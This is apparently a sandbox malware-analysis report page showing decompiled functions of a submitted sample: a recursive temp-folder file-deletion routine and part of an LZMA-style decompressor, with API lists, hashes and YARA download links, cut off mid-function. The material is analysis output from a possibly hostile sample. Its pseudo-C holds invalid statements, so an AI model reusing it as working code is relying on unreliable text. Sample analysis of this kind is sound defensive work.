                    Uniqueness Score: -1.00%

                    Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                    C-Code - Quality: 98%
                    			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                    0x00405d7e
                    0x00405d83
                    0x00405d8c
                    0x00405d8f
                    0x00405d97
                    0x00405d9a
                    0x00405d9d
                    0x00405da5
                    0x00405da7
                    0x00405da8
                    0x00000000
                    0x00405da8
                    0x00405db3
                    0x00405db6
                    0x00405db6
                    0x00405db6
                    0x00405dba
                    0x00405dcd
                    0x00405dd4
                    0x00405dd9
                    0x00405ddd
                    0x00405ded
                    0x00405ddf
                    0x00405de5
                    0x00405de5
                    0x00405df2
                    0x00405df6
                    0x00405e02
                    0x00405e08
                    0x00405e0d
                    0x00405e13
                    0x00405e1e
                    0x00405e24
                    0x00405e26
                    0x00405e29
                    0x00405ed3
                    0x00405ed3
                    0x00405ed7
                    0x00405ed9
                    0x00405ed9
                    0x00405ed9
                    0x00405ed9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405e2f
                    0x00405e2f
                    0x00405e2f
                    0x00405e37
                    0x00405e57
                    0x00405e5f
                    0x00405e64
                    0x00405e6b
                    0x00405e86
                    0x00405e8b
                    0x00405e8d
                    0x00405eb1
                    0x00405e8f
                    0x00405e8f
                    0x00405e92
                    0x00405ea6
                    0x00405e94
                    0x00405e97
                    0x00405e9f
                    0x00405e9f
                    0x00405e92
                    0x00405e6d
                    0x00405e73
                    0x00405e75
                    0x00405e7b
                    0x00405e7b
                    0x00405e75
                    0x00000000
                    0x00405e6b
                    0x00405e39
                    0x00405e41
                    0x00000000
                    0x00000000
                    0x00405e43
                    0x00405e4b
                    0x00000000
                    0x00000000
                    0x00405e4d
                    0x00405e55
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405eb6
                    0x00405ebe
                    0x00405ec4
                    0x00405ec4
                    0x00405ecd
                    0x00000000
                    0x00405ecd
                    0x00405df8
                    0x00405e00
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405dbc
                    0x00405dbc
                    0x00405dbe
                    0x00405ede
                    0x00405ee0
                    0x00405ee3
                    0x00405f34
                    0x00405f34
                    0x00405f34
                    0x00405ee5
                    0x00405ee8
                    0x00405ef3
                    0x00405ef8
                    0x00405efa
                    0x00000000
                    0x00000000
                    0x00405efd
                    0x00405f09
                    0x00405f0e
                    0x00405f10
                    0x00000000
                    0x00405f2b
                    0x00405f12
                    0x00405f15
                    0x00000000
                    0x00000000
                    0x00405f1a
                    0x00000000
                    0x00405f21
                    0x00405eea
                    0x00405eea
                    0x00000000
                    0x00405eea
                    0x00405dc4
                    0x00405dc7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405dc7

                    APIs
                    • DeleteFileW.KERNELBASE(?,?,7476FAA0,7476F560,00000000), ref: 00405D9D
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse83F2.tmp\*.*,\*.*), ref: 00405DE5
                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                    • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nse83F2.tmp\*.*,?,?,7476FAA0,7476F560,00000000), ref: 00405E0E
                    • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nse83F2.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nse83F2.tmp\*.*,?,?,7476FAA0,7476F560,00000000), ref: 00405E1E
                    • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                    • FindClose.KERNELBASE(00000000), ref: 00405ECD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                    • String ID: .$.$C:\Users\user\AppData\Local\Temp\nse83F2.tmp\*.*$\*.*
                    • API String ID: 2035342205-3283497432
                    • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                    • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                    • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                    • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 589 406d5f-406d64 590 406dd5-406df3 589->590 591 406d66-406d95 589->591 592 4073cb-4073e0 590->592 593 406d97-406d9a 591->593 594 406d9c-406da0 591->594 595 4073e2-4073f8 592->595 596 4073fa-407410 592->596 597 406dac-406daf 593->597 598 406da2-406da6 594->598 599 406da8 594->599 600 407413-40741a 595->600 596->600 601 406db1-406dba 597->601 602 406dcd-406dd0 597->602 598->597 599->597 606 407441-40744d 600->606 607 40741c-407420 600->607 603 406dbc 601->603 604 406dbf-406dcb 601->604 605 406fa2-406fc0 602->605 603->604 608 406e35-406e63 604->608 612 406fc2-406fd6 605->612 613 406fd8-406fea 605->613 615 406be3-406bec 606->615 609 407426-40743e 607->609 610 4075cf-4075d9 607->610 616 406e65-406e7d 608->616 617 406e7f-406e99 608->617 609->606 614 4075e5-4075f8 610->614 618 406fed-406ff7 612->618 613->618 622 4075fd-407601 614->622 619 406bf2 615->619 620 4075fa 615->620 621 406e9c-406ea6 616->621 617->621 623 406ff9 618->623 624 406f9a-406fa0 618->624 626 406bf9-406bfd 619->626 627 406d39-406d5a 619->627 628 406c9e-406ca2 619->628 629 406d0e-406d12 619->629 620->622 631 406eac 621->631 632 406e1d-406e23 621->632 640 407581-40758b 623->640 641 406f7f-406f97 623->641 624->605 630 406f3e-406f48 624->630 626->614 633 406c03-406c10 626->633 627->592 642 406ca8-406cc1 628->642 643 40754e-407558 628->643 634 406d18-406d2c 629->634 635 40755d-407567 629->635 636 40758d-407597 630->636 637 406f4e-407117 630->637 648 406e02-406e1a 631->648 649 407569-407573 631->649 638 406ed6-406edc 632->638 639 406e29-406e2f 632->639 633->620 647 406c16-406c5c 633->647 650 406d2f-406d37 634->650 635->614 636->614 637->615 645 406f3a 638->645 646 406ede-406efc 638->646 639->608 639->645 640->614 641->624 652 406cc4-406cc8 642->652 643->614 645->630 653 406f14-406f26 646->653 654 406efe-406f12 646->654 655 406c84-406c86 647->655 656 406c5e-406c62 647->656 648->632 649->614 650->627 650->629 652->628 657 406cca-406cd0 652->657 660 406f29-406f33 653->660 654->660 663 406c94-406c9c 655->663 664 406c88-406c92 655->664 661 406c64-406c67 GlobalFree 656->661 662 406c6d-406c7b GlobalAlloc 656->662 658 406cd2-406cd9 657->658 659 406cfa-406d0c 657->659 665 406ce4-406cf4 GlobalAlloc 658->665 666 406cdb-406cde GlobalFree 658->666 659->650 660->638 667 406f35 660->667 661->662 662->620 668 406c81 662->668 663->652 664->663 664->664 665->620 665->659 666->665 670 407575-40757f 667->670 671 406ebb-406ed3 667->671 668->655 670->614 671->638
                    C-Code - Quality: 98%
                    			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
